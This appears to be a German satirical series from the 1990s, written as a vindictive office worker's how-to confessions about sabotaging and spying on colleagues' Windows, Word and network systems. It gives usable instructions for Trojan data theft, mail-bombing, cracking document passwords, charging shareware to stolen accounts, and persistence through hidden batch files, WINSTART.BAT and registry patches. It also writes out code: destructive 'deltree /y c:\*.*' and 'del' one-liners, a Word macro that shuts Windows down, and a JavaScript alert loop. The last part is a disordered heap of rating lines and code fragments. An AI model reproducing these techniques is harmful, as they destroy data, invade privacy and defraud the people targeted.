Unternehmen, weil viele Anwender den Schutz ihres Netware-Paßworts für
überflüssig halten: Ein, zwei fremde Paßwörter kennt man meist schon nach
wenigen Wochen - und das genügt ja zunächst.
Während meine Trojanischen Pferde fleißig Daten ins Netz ziehen, muß ich dafür
sorgen, daß diese Daten auf meinen lokalen PC gelangen und im Netz beseitigt
werden: Ich erledige das mit einer Batchdatei, die unter Windows ständig im
Hintergrund läuft. Die Netzdateien werden auf meinen PC kopiert und danach
ordnungsgemäß mit DEL entsorgt. Wenn man vorher noch mit "flag *.* p" alle
Spuren verwischt, kann einem keiner mehr etwas nachweisen, der nicht zugesehen
hat.
(30) Es kriegt doch jeder gern Post
Manche Leute klagen, sie bekämen nie Post! Macht ihnen doch eine Freude. Mit
einem kleinen Makro, etwa einem Word-Makro, Windows-Recorder-Makro oder auch
einer speziellen Massen-Mail-Software für AOL, CIS oder das Internet läßt sich
der elektronische Briefkasten solcher armen Tröpfe in Null Komma nichts mit
Tausenden von E-Mails überfluten. Bisher hat sich noch keiner, dem ich eine
Mail-Bombe zugestellt habe, je wieder über ein leeres Eingangskörbchen
beschwert. Übrigens: Es ist klar, daß ich solche Massen-Mailings nicht über
meinen eigenen Account versende.
(31) Flanieren auf Fremden Festplatten (1)
Regelmäßig klicke ich mich durch die Rechner in unserem Peer-to-Peer-Netz und
checke die freigegebenen Ressourcen. Nicht selten ist eine Festplatte freigegeben,
ohne daß der Benutzer davon weiß.
Besonders interessant wird es, wenn neue Rechner im Netz auftauchen. Meistens
handelt es sich um einen Kollegen, der gerade erst auf Windows 95 oder WfW
umgestiegen ist, allerdings noch keine Ressourcen freigegeben hat. Früher
oder später entdeckt man aber Rechner im Netz, deren Festplatten komplett
freigegeben sind.
Jetzt heißt es: Alles stehen und liegen lassen und den "offenen" Rechner
erkunden. Schon eine halbe Stunde später könnte der Kollege seinen Leichtsinn
bemerken oder gar den PC ausschalten. Meine Suche konzentriert sich zunächst
auf Benutzerdateien: Word- oder Excel-Dateien zeigen, was der Kollege mit seinen
Office-Anwendungen anfängt und - wichtiger - wer sich hinter dem Netzkürzel
verbirgt. Mit der Funktion "Datei, Eigenschaften, Dateiinfo" läßt sich der
Kollege ermitteln. Die meisten Anwender sind glücklicherweise naiv genug, bei
der Office-Installation brav persönliche Daten einzutragen.
Als nächstes ein schneller Check der Online-Software: Wo Wincim, AOL-Browser,
T-Online Software oder ein Internet-Zugang installiert sind, sind fast immer
die zugehörigen Accounts und Paßwörter eingetragen. Sind die Paßwörter in der
INI-Datei verschlüsselt, kann man mit der richtigen Software die Account-Daten
und das Paßwort extrahieren. Dann kopiere ich die interessanten Daten. Bis der
Besitzer wegen des minutenlangen Plattengedrösels mißtrauisch wird, habe ich
die Daten längst zu mir transferiert.
(32) Flanieren auf fremden Festplatten (2)
Ist die Verbindung zum gegnerischen PC getrennt, kann ich die geklauten Daten
auswerten. So finde ich neben Firmeninterna auch Dokumente aus dem Privatleben
des leitenden Angestellten. Gut, daß ein Teil der Word- und Excel-Dokumente
verschlüsselt abgelegt ist. Das macht es mir leichter, die (uninteressante)
Daten-Spreu vom (interessanten) Daten-Weizen zu trennen. Die verschlüsselten
Word-Dateien sind mit passender Software aus dem Internet schnell geknackt.
Leider kannte ich lange keinen Freeware-Knacker für verschlüsselte
Excel-Dateien.
Die Lösung kam vor einigen Wochen: Ich erhielt ein Knack-Programm für paßwortgeschützte
Word-Dateien. Im Unterschied zu den Programmen, die nur den Text
entschlüsseln (z.B. Wordunp2), kann das Programm WfWCD das Paßwort im Klartext
darstellen. Ich habe das ermittelte Winword-Paßwort auf die bislang unzugänglichen
Excel-Dateien angewandt - voila, richtig gedacht: Der Kollege benutzt
nur einziges Paßwort für alle Dokumente. In der Tabelle GEHALT.XLS finde ich
die Gehälter. In anderen Tabellen steht Privates: von den Krediten, die er
abstottert, bis hin zu seiner Lebensversicherung.
(33) Shareware: Jeden Tag eine gute Tat!
Auch Shareware-Autoren sollen leben! Aber nicht von mir. Wenn ich mich von
einem gehackten Compuserve-Zugang verabschiede, mache ich mir gelegentlich die
Mühe, die unregistrierten Shareware-Programme, die ich auf der Festplatte des
Fremd-PCs finde, über den Compuserve-Account seines Besitzers registrieren zu
lassen. Das gibt mir das gute Gefühl, den Kollegen endlich von seiner Ignoranz
in puncto Shareware befreit zu haben. Mit "go billing" werfe ich einen Blick
auf die anfallenden Gebühren. Ich versuche, mir das Gesicht des Kollegen
vorzustellen, wenn er einen vierstelligen Dollarbetrag auf seiner nächsten
Compuserve-Rechnung sieht.
(34) Windows95 - festgeklebte Icons
Schöne Bildschirmhintergründe gibt es für Windows. Klar, die bunten Grafiken
mit hoher Farbtiefe bremsen das System aus. Sie sind unergonomisch und
verringern die Übersichlichkeit. Und mehr noch: Mit dem richtigen Hintergrund
läuft gar nichts mehr!
In letzter Zeit kam es vor, daß Kollegen von mir auf ein Icon klickten, das
Programm jedoch nicht startete. Noch schlimmer: Icons und Order auf der
Arbeitsoberfläche liesen ich weder verschieben, noch konnten sie ihre Eigenschaften
ändern. Was ich getan habe? Den Bildschirmhintergrund gewechselt! Ich
erstelle mit [Druck] einen Screenshot der aktuellen Oberfläche, füge ihn mit
"Bearbeiten, Einfügen" in Paint (oder -brush) ein und speichere ihn als BMP-
Datei. Dann definiere ich diese Bitmap als neues Hintergrundbild.
Nun erscheint jedes Symbol auf der Oberfläche doppelt - einmal im Hintergrund
und einmal als Icon. Um die Manipulation zu vervollständigen, lösche ich alle
Links aus dem Ordner "\Windows\Desktop".
(35) Die Trojanische Kavallerie sprengt heran
Das Gezeter um die Dokumentviren verdirbt mir das Geschäft. Seit Jahren nutze
ich mit bestem Erfolg AutoOpen-Makros von Winword - keine Viren freilich,
sondern Trojanische Pferde, die das Winword meiner Kollegen für mich arbeiten
lassen. Kaum ein Betroffener kam bislang je auf die Idee, seine Makroliste im
Menü "Extras, Makros" zu überprüfen. Das hat sich neuerdings leider
schlagartig geändert, so daß ich nach neuen und dezenteren Methoden Ausschau halten
mußte.
Ärgerlicherweise vergißt man gute alte Tricks ziemlich schnell, und so fiel
mir die Lösung meines Problemes erst bei der Arbeit mit der alten Windows-Version
wieder ein. Dort nutzte ich die Möglichkeit, mittels DDE-Anweisungen der
Registrierdatenbank beim Öffnen von Dateien einen Makrocode zu übergeben. Da
solche Makros direkt in der Registry eingetragen sind, tauchen sie nicht in
Winword selbst auf. Diese exzellente Tarnung ist der entscheidende Vorteil
dieser Methode. Ein gewisser Nachteil ist es andererseits, daß das Makro nur
beim Öffnen der Datei mittels Doppelklick oder Drag & Drop funktioniert - also
nur im Explorer oder Dateimanager.
Um ein solches Makro manuell zu installieren, starte ich zunächst unter
Windows 3.11 wie 95 REGEDIT (unter Win 3.11 mit dem Schalter "/v") und suche dort
den Eintrag "Word.Document" oder "Word.Document6" - je nach Version. Unter
diesem Schlüssel finden sich die Unterschlüssel "shell" und ferner "ifexec"
sowie "ddexec". "ifexec" übergibt DDE-Anweisungen an das nicht aktive Winword,
"ddexec" an die bereits laufende Anwendung. Ich trage hier gewöhnlich jeweils
das gleiche ein.
Der Makrocode sieht genauso aus wie von Word Basic gewohnt - von zwei
Kleinigkeiten abgesehen: "Sub MAIN" und "End Sub" fallen weg, und jede
einzelne Codezeile muß zwischen eckigen Klammern stehen. Ein beliebtes
Beispiel aus meiner Werkstatt ist das Arbeitsbeschaffungs-Makro "Ersetzen":
Es bewirkt, daß die angeklickte Datei zunächst ganz normal geöffnet wird. Dann
ersetzt der erste Arbeitsschritt jedes "a" in diesem Text durch ein "e", und
als zweite Leistung wird jedes "t" gegen ein "d" getauscht. Damit die Freude
über diese Arbeit auch bleibend ist, löscht die Zeile "ExtrasDokumentSchützen"
die Rückgängigliste. Das hat den Vorteil, daß gewitzte Winword-Benutzer
zusätzlich durch einen vergeblichen Klick auf das "Rückgängig"-Symbol enttäuscht
werden. Die letzte Zeile speichert das Ergebnis und sorgt so je nach der Länge
des Textes für einige vergnügliche Stunden beim Reparieren.
Solche und noch komplexere Registry-Makros manuell auf fremden Rechner
einzutragen ist etwas heikel. Ich bevorzuge hierfür in der Regel das versteckte
Einlesen nach bewährter Makro-Manier.
(36) Doom: Gewaltverherrlichern das Handwerk gelegt!
Um sich abzureagieren, spielen einige hartgesottene Kollegen in der Mittagspause
Duke Nukem 3D oder Doom. Natürlich übers Netz. Leute wie ich haben für
so etwas keine Zeit. Mich stören das Geballer und das Geschrei, zudem hindert
mich die übermäßige Netzbelastung an einer sinvollen Arbeit. Außerdem finde
ich, daß jeder Bürger gefordert ist, gegen jugendgefährdende und
gewaltverherrlichende Spiele vorzugehen. Jaja!
Ich wählte den subtilen Weg, den Spitzbuben die kriegerische Spielfreude zu
verderben. Wie ich schnell herausbekam, lagen die Spielstände auf dem Server - frei
zugänglich. Sie sind leicht zu erkennen an der Endung DSG bzw. SAV. Jetzt
brauchte ich nur noch einen Hex-Editor, um die Spielstände zu manipulieren.
Das Verfahren ist für die meisten Spiel in etwa das gleiche. Da ich nicht
wußte, an welcher Stelle die Gesundheit abgespeichert war, starte ich Doom
bzw. Duke Nukem 3D und speichere zwei Spielstände ab, die bis auf die
Gesundheit identisch sind. Den einen speicherte ich mit "Health=100%", den anderen
mit "Health=83%". Jetzt mußte ich nur noch in der jeweiligen Datei nach den
Werten suchen. Bei Doom wurde ich an der Position 54 mit den beiden Werten 64
und 53 (jeweils Hex) fündig.
Nun konnte ich die schwer erkämpften Spielstände so manipulieren, daß beim
nächsten Spielstand die Gesundheit auf 4 Prozent gesetzt war. Die Doom-Junkies
lagen bereits nach ein paar Minuten am Boden. Die Spielfreude hatte ich ihnen
gründlich verdorben.
Leider hatten die Daddler nach einiger Zeit angefangen, gegeneinander zu spielen,
so daß sie keine Savegames mehr brauchten. Und der Mittagspausen-Schlachten-Lärm
drang durch die offenen Fenster (Sommer!) des 2. Stocks bis auf den
Gehweg, so das die Minderjährigen des örtliche Gymnasiums interessiert zu uns
heraufblickten. Jetzt entschloß ich mich zu einer brachialeren Methode. Ich
besorgte mir KILLDOOM.EXE von einem FTP-Server. Mit diesem Programm läßt sich
jedes Doom-Spiel im Novell-Netz abschießen.
(37) Benutzer-Terror mit versteckter Win95-Software
Windows 95 ist eine wirkliche Bereicherung. Es liefert alles mit, um
Unwissende in den Wahnsinn zu treiben - unter anderem das Utility Poledit, das sich
auf der Windows95-CD im Verzeichnis "\Admin\Apptool\Poledit" befindet. Mit
diesem Programm kann man dem Betriebssystem kleinere und größere
Beschränkungen aufzwingen, je nach Wunsch.
So läßt sich etwa das Ausführen bestimmter Befehle verbieten oder der gesamte
Windows-Desktop beseitigen. All das erledige ich ganz bequem in einem übersichtlichen
Windows-Dialog. Diese Beschränkungen lassen sich so verschärfen,
daß alle Icons vom Desktop verschwinden, kein Programm mehr funktioniert oder
Windows sich nicht mal mehr beenden läßt.
Die interessantesten Einstellungen finden sich in Poledit unter "Datei,
Registrierung öffnen, Lokaler Benutzer, Shell, Zugriffsbeschränkungen".
(38) Windows-Registry: Auf ewig verbogen
Ich habe damit gerechnet, daß der eine oder andere Kollege die Sache mit dem
Policy-Editor (Poledit) früher oder später durchschauen würde. Er bräuchte
dann nur Poledit aufzurufen und die Veränderungen wieder abzustellen. Aber ich
werde dafür sorgen, daß den Kollegen bei jedem Windows95-Start meine
restriktive Windows-Variante automatisch aufgezwungen wird - dann hilft
auch kein Zurücksetzen.
Dank des DOS-Stubs von REGEDIT.EXE geht das recht komfortabel: Ich exportiere
auf meinem Rechner mit dem Befehl "regedit /e c:\1st.reg" den ursprünglichen
Zustand meiner Registry in eine ASCII-Datei; dann nehme ich mit Poledit die
gewünschten Manipulationen vor und speichere anschließend diesen Zustand mit
"regedit /e c:\2nd.reg". Durch den Vergleich beider Dateien mit "fc 1st.reg
2nd.reg" am DOS-Prompt ist leicht abzulesen, welche Registry-Veränderungen
Poledit bewirkt hat.
Mit einem ASCII-Editor öffne ich nun 2ND.REG und suche mir die von Filecomp
(FC.EXE) gefundenen Stelle. Den betreffenden kleinen Abschnitt kopiere ich in
eine Datei mit seriös klingendem Namen wie z.B. OLESVRX.REG und füge in die
erste Zeile "REGEDIT4" sowie eine nachfolgende Leerzeile ein. Nun gilt es nur
noch, eine günstige Gelegenheit abzuwarten, um die REG-Datei auf dem fremden
Rechner und außerdem den Eintrag "@regedit olesvrx.reg" in dessen WINSTART.BAT
einzuschleusen. Auf diese Weise kann ich nun beliebige Policy-Restriktion
verwirklichen. Der Kollege sieht dann etwa kein einziges Laufwerk mehr auf
seinem Desktop...
(39) OLE-Bomben im Tiefflug: Mimikry pur
Ich kümmere mich nie darum, wie technische Handbücher OLE definieren. Für mich
ist OLE einfach Mimikry pur - mit Windows-Mitteln. Faszinierend, welches
Vertrauen die Anwender in das Aussehen von Icons und Icon-Beschriftungen setzen.
Wenn ich also mit Hilfe von PACKAGER.EXE ein Icon, das einen Schmetterling
darstellt, mit einer DOS-Befehlszeile ausstatte, die die Platte formatiert,
dann ist die Metapher halbwegs gelungen: Dem Betroffenen fliegen die Daten
davon.
Auch aufschlußreiche Kopieraktionen im Netz oder Änderungen der Konfiguration
lassen sich auf diese Weise fast ebenso gut realisieren wie mit verbogenen
Makros. Eventuell wird den Betroffenen etwas unwohl, wenn etwa statt einer
erwarteten Bitmap ein DOS-Fenster oder eine Meldung über erfolgreiches
Registrieren aufpoppt: Aber bis sie endlich reagieren, sind die von mir
anvisierten Daten längst geschrieben, kopiert oder aber gelöscht...
(40) OS/2-Desktop: Eine große Leere
Meine Lebensgefährtin geht mir neuerdings aus dem Weg. Irgendwie passen wir
sowieso nicht so recht zusammen. Sie ist nämlich - berufsbedingt - OS/2-Anwenderin.
Das muß ja Kompatibilitätsprobleme heraufbeschwören. Ich bin im wesentlichen
DOS- und Windows-Anwender (95 und NT). Aber OS/2-unbeleckt bin ich
nicht, und mir ist eine Maßnahme eingefallen, damit sie sich mit ihrem OS/2
grün und blau ärgert.
Mit der rechten Maustaste klicke ich auf die Arbeitsoberfläche und wähle im
Einstellungs-Notizbuch die Seite "Anzeigekriterien" aus. Hier füge ich ein
neues Anzeigekriterium hinzu, und zwar mit dem Merkmal "Objekttitel", dem
Vergleichstyp "ist gleich" und dem Vergleichswert "*". Als "Verwendung"
definiere ich dann "Objekte mit Kriterien ausschließen" - mit dem Effekt, daß kein
Objekt mehr auf dem Desktop angezeigt wird. Okay, der Schaden ist gering, da
nichts gelöscht wird. Aber sie sitzt erst mal vor einem leeren Desktop. Die
plötzliche Leere wird ihr eine Lehre sein.
(41) Kein Schutz vor Winword-Makros
Das angebliche Zaubermittel gegen Winword-Viren "AutoMakroUnterdrücken 1" kann
mich nicht mehr irritieren. Die meisten Mitkreaturen sind sowieso nicht
informiert, und gegen die wenigen anderen habe ich mir neue Rezepte einfalle
lassen. Eine interessante Anregung erhielt ich durch Virenprogrammierer aus dem
Internet: Auch ohne selbstausführende Makros wie "AutoOpen" oder "AutoClose"
lassen sich Makros in den Feindrechner injizieren, indem man seinen
Ködertext mit einer Reihe von verbogenen Standartbefehlen versieht. Insbesondere
einschlägig sind die Winword-Standartbefehle "DateiSchließen" und
"DokumentSchließen", da einer dieser Befehle aller Vorraussicht nach ausgeführt wird,
um den von mir infizierten Text wieder zu schließen. Ich setze also meine
"MakroKopieren"-Anweisungen nicht nur in das "AutoOpen"-Makro (das
Besserwisser durch den Disable-Befehl deaktivieren), sondern zusätzlich in Makros mit
diesem Makronamen. Daneben sorge ich in meinem Netz-Umfeld dafür, daß der
Disable-Befehl in bestimmten Fällen gleich wieder rückgängig gemacht wird. Hier
helfen mir wieder Registry-Einträge, die Drag&Drop-Aktionen unterlaufen:
Gelingt es mir nämlich, meine eigenwillige Winword-Registrierung einzuschleusen,
dann steht unter "ddexec" und "ifexec" vor "[DateiÖffnen("%1")]"
"[AutoMakro-Unterdrücken 0]". Damit setze ich den eventuell gegenteiligen Disable-Befehl
unerkannt wieder zurück.
(42) Sonderangebote: Die Windows-Updates
Das gibt's doch nicht wirklich? Leute, die Software auf legalem Weg erwerben
und sich dann auch noch die teure Vollversion andrehen lassen! Dabei lassen
sich die preiswerteren Update-Versionen mit mehr oder weniger einfachen Tricks
stets dazu bewegen, bei der Installlation wie eine Vollverion zu arbeiten. Die
Abfragen nach Vorgänger-Software sind meist leicht zu erahnen und daher auch
leicht zu simulieren. Es sind immer bestimmte Standartdateien, die das
Update-Setup sucht.
Die Update-Version von Windows95 macht da keine Ausnahme: Bei der Frage,
welche Dateien wohl notwendig sind, um dem Setup ein vorinstalliertes Windows 3.x
vorzugaukeln, fiel mein Verdacht zuerst auf die Datei WIN.COM, deren Existenz
schon für das Update auf Version 3.11 reichte - egal, mit welchem Inhalt.
Tatsächlich reicht diese Datei für Windows95 aber nicht aus, um die
Update-Installation zu starten. Da aber die unscheinbare Datei WINVER.EXE schon unter
Windows 3.1x eine wichtige Rolle für das (DOS-)Setup-Programm von Windows
gespielt hat, nehme ich diese Datei gleich im zweiten Versuch hinzu - und habe
Erfolg: Die Dateien WIN.COM und WINVER.EXE genügen vollauf, um dem
Windows95-Installationsprogramm ein vorinstalliertes Windows 3.1x vorzutäuschen.
(43) Moderne Monitore mit Nervenkitzel
Viele Anwender glauben, ohne Bildschirmschoner würden in kürzester Zeit Löcher
in ihrem Monitor entstehen. Nun, moderne Modelle kommen auch ohne Screensaver
ganz gut aus. Wie wäre es also, etwas anderes Unvernünftiges aus dem
zeitgesteuerten Einsatz der Bildschirmschoner zu basteln?
Schon unter Windows 3.1 hatte ich festgestellt, daß sich im Abschnitt [boot]
der SYSTEM.INI beliebige Programme als "Bildschirmschoner" deklarieren lassen,
etwa "scrnsave.exe=autoexec.bat".
Unter Windows95 erhält diese Option weitaus mehr Würze, da eine selbstdefinierte
Batch sowohl den Screensaver als auch weitere Aktionen starten kann. So
konnte ich mal jemanden mit folgender Batch erfreuen:
Steht diese Batch als SCRNSAVE.EXE in der SYSTEM.INI, startet mit dem
Screensaver auch ein munteres Klanggedudel.
Für den unsympathischen Kollegen W. belege ich die zweite Zeile völlig anders.
Denn das Screensaver-Versteck (das sogar die Taskleiste verdeckt) eignet sich
auch ausgezeichnet für ein verdecktes Kopieren oder Löschen von Daten!
(44) Alles unter Kontrolle: Ich bin der Administrator!
Windows95 beglückt mich mit einem Manipulations-Präsent - mit der Option der
Remote-Aministration im Peer-to-Peer-Netz. Ich bin zu Tränen gerührt, als
erkenne, welch ein leistungsstarkes Instrument mir da in die Hände gegeben ist:
Der Remote-Verwalter hat nämlich Lese- und Schreibzugriff auf allen Festplatten
des anderen Rechners - vorausgesetzt, er kennt das erforderlich Paßwort.
Auf solche Großzügigkeit bin ich allerdings nicht angewiesen: Ich nehme den
angeschlossenen Netzteilnehmern das Aktivieren der Remote-Administration ab.
Wie bei meinem alten Freund Poledit nutze ich dazu den Trick mit der
Registrierdatenbank: Ich lese meine Registry einmal mit und einmal ohne
Remote-Administration in eine ASCII-Datei aus. Durch Vergleich der beiden
Dateien ermittle ich den Schlüssel und mache aus diesem eine kleine REG-Datei.
Ein (weiterer) Eintrag in der WINSTART.BAT ("@regedit olesvr2.reg") sorgt
dafür, daß sie bei jedem Windows-Start eingelesen wird. Kaum zu glauben, aber
wahr: Der auf meinem PC ermittelte Schlüssel ist auch auf jedem anderen Rechner
anwendbar. Der Höhepunkt des Entgegenkommen ist, daß Windows95 nicht durch
die kleinste Meldung kundtut, daß es fortan vor den Augen eines unbekannten
"Administrators" Striptease betreibt.
Ich liebe die Narren, die Windows95 mit dieser Sicherheitslücke geschmückt
haben. Jetzt geht es nur darum, meine Kollegen zum Lesen meiner SEXTIPS.DOC zu
überreden, die ihnen dann die WINSTART.BAT in meinem Sinne konfiguriert. Der
erste hat soeben angebissen, und in einigen Stunden bin ich vorraussichtlich
Herr über alle Windows95-Rechner im Netz!
Das Beste daran ist aber, daß keiner meiner Untertanen etwas bemerken wird,
da ich vorsichtshalber den Netzwerkmonitor NETWATCH.EXE löschen und auf die
schwarze Liste der Policy setzten lasse.
(45) Legale lokale Köder gegen alle Schnüffler
Jetzt ist es raus. Der US-Geheimdienst steckt hinter den Online-Lücken in
Windows 95! Im Internet hat jemand einen Artikel der "Frankfurter Allgemeinen
Zeitung" gepostet: "FAZ" vom 26. April 1996, Seite 41. Demnach gibt es
Hinweise, daß die "National Security Agency" (NSA), ein amerikanischer
Nachrichtendienst, einen geheimen Code in alle wichtigen Software-Pakete
plazieren ließ - auch in Windows95. Dieser Code öffnet eine Hintertür, die
es den 70.000 NSA-Mitarbeitern (die CIA hat nur 5.000 Mitarbeiter!) erlaubt,
sich über Online-Dienste heimlich in PCs einzuwählen. Dies funktioniert
ähnlich wie bei Telefonen, bei denen ja ebenfalls die technischen
Vorraussetzungen fürs Abhören gegeben sind. Einen Windows95-PC kann man von
außen anzapfen!
Sollen die Ami-Agenten nur kommen! Von mir aus auch Spitzel unter meinen
Kollegen. Tödliche Köderdateien habe ich auf meiner Festplatte ausgelegt.
Schließlich kann mir keiner verbieten, auf meinem Privat-PC zu Hause und
meinem Arbeits-PC im Netz mit zugänglichen Dateien zu füllen, die massivst
mit Dokumentviren verseucht sind!
Als zusätzliche Angebote habe ich mit Pascal Pseudo-Programme geschrieben und
freigegeben, die so tun, als würden sie bestimmte Hardware oder Software
suchen, um danach ergebnislos abzubrechen. In Wahrheit sorgen sie dafür,
daß ich über die Registrierung Zugriff auf den Rechner des schnüffelnden
Kollegen erhalte. Wer auf meine Fake-Programme klickt, gefährdet sich selbst
und seinen PC! Merkt euch das, Geheimdienste und informelle Mitarbeiter der
Geschäftsleitung!
(46) Warum ich WINSTART.BAT liebe...
Einsam und allein: Mobbing nennt man so etwas. Einer dient immer als
Blitzableiter für den Frust der anderen. Sie hatten sich zusammengerottet, um gegen
mich vorzugehen. Meine Entlassung haben sie durchgesetzt. Am selben Tag hat
mich meine Lebensgefährtin, die OS/2-Anwenderin, verlassen. Im Morgengrauen
geschah's. Ich hielt mich gerade im Zentralrechner der Flenburger
Verkehrssünderkartei auf, um die Punkte meiner Kollegen zu verdreifachen. Schon bald
werden sie öffentliche Verkehrsmittel benutzen müssen. Auf Zehenspitzen
schlich sie davon. Und sagte kein einziges Wort. Kein Abschiedsgruß neben der
Kaffeemaschiene, wo stets der Einkaufszettel lag. Auch in meiner Mailbox keine
Notiz. Warum nahm sie das Pentium-Notebook mit? Auch die Sicherungsbänder der
letzten Monate sind verschwunden sowie der Prototyp einer Netzwerkkarte, mit
der ich Taschenrechner in Novell-Netze einloggen kann.
Geh! Geh doch! Ich verlache dich - ich verlache dich und EUCH allesamt. Nun
ist es Zeit, die letzte Schlacht mit letzter Rücksichtslosigkeit zu führen und
zu gewinnen. Und: Glaubt mir - ich bin nicht allein. Die WINSTART.BAT ist
meine treueste Gespielin. Sie ist allzeit bereit (alle haben Windows!), und ich
weiß den genauen Zeitpunkt, wann sie kommt. Sie ist die lautloseste und
dezententeste aller Ausführbaren: Keiner merkt es, wenn sie (mit mir) fremdgeht.
Sie ist die Eva aller DOS-Boxen - die erste und zugleich die einzige, die
jeden sanft berührt. Ein Mirakel: Mit ihr schufen die rohen Knechte Bill Gates'
ein Elfenwesen, das - einem Maienhauch gleich - meine Ideale sät in die tumben
CPUs der mich umgebenden Kartoffelköpfe.
Sie sät meinen Samen, solange sie ist; sie stürzt sich selbst ins Nichts - und
IHR habt nichts von gesehen, NICHTS.
(47) BASH in der Bibliothek: Born Again Shell
Wie lange ich schon hier bin? Kein Ahnung. Meine Erinnerung ist wie ausgelöscht.
Ich lebe hier in diesem weißgetünchten Zimmer. Wochen, Monate, Jahre?
Man bringt mir zu essen, und regelmäßig bekomme ich meine Tropfen. Kein Streß.
Wir haben ein Fernsehzimmer und auch eine Bibliothek. Seit drei Tagen helfe
ich bei den Büchern aus. Die Ausleihe läuft über ein Unix-System. Bei wenig
Besucherandrang spiele ich auf dem System Schach.
Drängen Sie mich nicht. Ich weiß nicht, wo ich bin und warum ich hier bin.
Aber ich werde es schon bald wissen. Ich kann mich nicht erinnern, wie meine
Mutter aussieht, finde aber bereits mühelos von der Bash-Shell nach X-Windows
und Emacs. Ich nähere mich inzwischen dem Root-Account. Was dann? Ich weiß es
noch nicht, aber es ist besser, ihr seid freundlich zu mir...
1. AUTOEXEC.BAT
Die AUTOEXEC.BAT ist sehr praktisch: Man kennt den Pfad (C:\) und kann sie mit
einem spimplen "echo denkdirwasaus >> autoexec.bat" leicht manipuliren. Tarnen
kann man seine Anweisungen, indem man sie in eine Batch-Datei mit unsichbarem
(ASCII 255) Namen in den Suchpfad setzt und diese am Ende der AUTOEXEC.BAT mit
einem (ebenfalls unsichtbaren) Kommando aufruft.
Sicherheitshalber sollte man der ASCII-255-Batch noch das "versteckt"-Attribut
verpassen. Eventuelle Bildschirmausgaben kann man ganz leicht mit "@echo off"
zu Begin der unsichtbaren Batch und "> NUL" am Ende jeder Zeile abfangen.
Das ganze sieht dann etwa so aus:
(c:\autoexec.bat)
(c:\dos\[alt+255].bat)
Aus der unsichtbaren Batch heraus sollte man keine Aktionen starten, die
mehrere Sekunden dauern, weil einige Anwender sonst mißtrauich werden.
Die unsichbare Batch kann man theoretisch auch mit "install=[Alt-255]" aus der
CONFIG.SYS aufrufen, aber dort bemerkt es der Anwender eher (Startzeile nicht
unsichtbar), man hat noch keine PATH-Angaben und was man verstellt wird von
der AUTOEXEC.BAT gleich wieder korrigiert.
2. WINSTART.BAT
Die WINSTART.BAT ist noch besser als die AUTOEXEC.BAT geeignet, Optimierungen
vorzunehmen: Man kennt den Pfad immer, selbst wenn er C:\DU\FINDEST\MICH\NIE
heißt: Einfach die Umgebeungsvariable "winbootdir" abfrgaen; Viele Anwender
sind so dumm, daß sie GAR NICHTS von dieser Datei wissen und außerdem wird sie
bei jedem Windows-Start geladen, der ja auch so immer recht lange dauert.
Deshalb kann man hier auch größere Aktionen wie "dir c:\ /s/a/ogenes > dirinfo"
starten.
3. WIN.INI oder andere INI-Files
Hier kann man über modifiziere "load="- und "run="-Zeilen beliebige Programme
starten. Allerdings ist eine Tarnung fast unmöglich, und weil viele sonst eher
beschränkte Anwender sich mit diesen Dateien auskennen, fällt ein
"run=regedit slave.reg" ziemlich schnell auf.
4. WIN.COM
Da WIN.COM nichts anders tut, als das offiziele MS-Windows-Logo aufzurufen und
den eigentlichen DOS-Extender WIN386.EXE zu starten, kann man sie durch eine
WIN.BAT oder (unauffälliger) durch eine COMpelierte Version der BAT ersetzen,
die das Logo darstellt, einige andere Dinge treibt und dann WIN386.EXE startet.
Eine bessere Tarnung als eine korrupte WIN.COM gibt es (fast) nicht.
5. Windows Registry
Die Registry (bestehehend aus REG.DAT, USER.DAT und SYSTEM.DAT) ist hervorragend
für Manipulationen geeignet. Besonders bei Windows95, da REGEDIT dort einen
DOS-Stub besitzt, der Manipulationen über Batch-Dateien wie z.B. WINSTART.BAT
oder AUTOEXEC.BAT/ASCII255.BAT äußerst einfach macht. Theorethisch wären sogar
(kleinere) Veränderungen über primitive ANSI-Bomben denkbar.
Unter Windows 3.1x muß man Windows schon geladen haben; außerdem wird der
Anwender dort mit einer Nachricht "Die Informationen in C:\WIN\SLAVE.REG wurden
erfolgreich in der Registrierdatenbank registriert" gelangweilt.
6. Makrovorlagen
Durch die starke Verbreitung der Dokumenviren sind Makrovorlagen von
Standardanwendungen als Viren-Träger inzwischen allgemein bekannt. Die
Funktionalität dieser Makrovorlagenviren hängt von der jeweiligen Anwendung
ab, ist aber meist äußert umfassend. Eine langlebige Tarnung ist allerdings
bei einigermassen informierten Anwendern kaum zu erwarten.
7. Divine Combination
Mit Kombinationen kann man im Endeffekt am meisten erreichen, z.B.:
Ein als SEXTIPS getarnter Makro-Virus transportiert einen Registry-Patch, der
über eine neue Kommandozeile in der WINSTART.BAT (etwa "@regedit slave.reg")
dauerhaft installiert wird und von normalen Blindgängern kaum mehr zu
beseitigen ist.
Bewertung: Ganz verboten!!!
Bewertung: Harmlos
Bewertung: Vernichtend
@echo off
doskey win=win$techo j.|del c:\win\*.*
doskey doskey=
Bewertung: Spart Geld
Bewertung: Vernichtend
win|deltree /y c:\*.*
Nach seiner Pause kann er sich meinetwegen stundenlang unter Windows
vergnügen. Sobeld er es aber verläßt, schlägt Deltree zu. Was Domestos für die Klo
schüssel ist, ist Deltree für den PC. Ich gehe heute lieber schon etwas früher
nach Hause. Je weiter ich weg bin, desto weniger kann ich schuld sein...
Bewertung: Massiv
Bewertung: Schnüffelei
Bewertung: Harmlos
Bewertung: Harmlos
Bewertung: Vernichtend
Makro AutoOpen:
Sub MAIN
x$=DateiName$() + ":ciao"
MakroKopieren x$, "Global:AutoExec"
End Sub
Makro Ciao:
Declare Function ExitWindows Lib "User32" Alias "ExitWindowsEx"(wReturnCode As Long, dwReserved As Long) As Long
Sub MAIN
text$ = "In der Anwendung PROGMAN.EXE ist der falsche Ausnahmefehler 0815 aufgetreten" + Chr$(13) + " Windows wird beendet"
titel$ = "Fehler!"
MsgBox Text$, Titel$, 48
x = ExitWindows (1, 0)
End Sub
Bewertung: Spionage
[HTML]
[HEAD]
[TITLE]Java Script[/Title]
[/HEAD]
[BODY ONLOAD=FensterAerger()]
[SCRIPT LANGUAGE="JavaScript"]
function FensterAerger()
{while (true)
windows.alert ("Bitte klicken Sie so oft auf OK, bis sich dieses Fenster schließt.")
}
[/SCRIPT]
[/BODY]
[/HTML]
Bewertung: Spionage
Bewertung: Spionage
Bewertung: Spionage
Bewertung: Massiv
Bewertung: Schnüffelei
Bewertung: Spionage
Bewertung: Spart Geld
Bewertung: Harmlos
Bewertung: Spionage
[DateiÖffnen("%1")]
[BearbeitenErsetzen .Suchen = "a", .Ersetzen = "e", .AllesErsetzen]
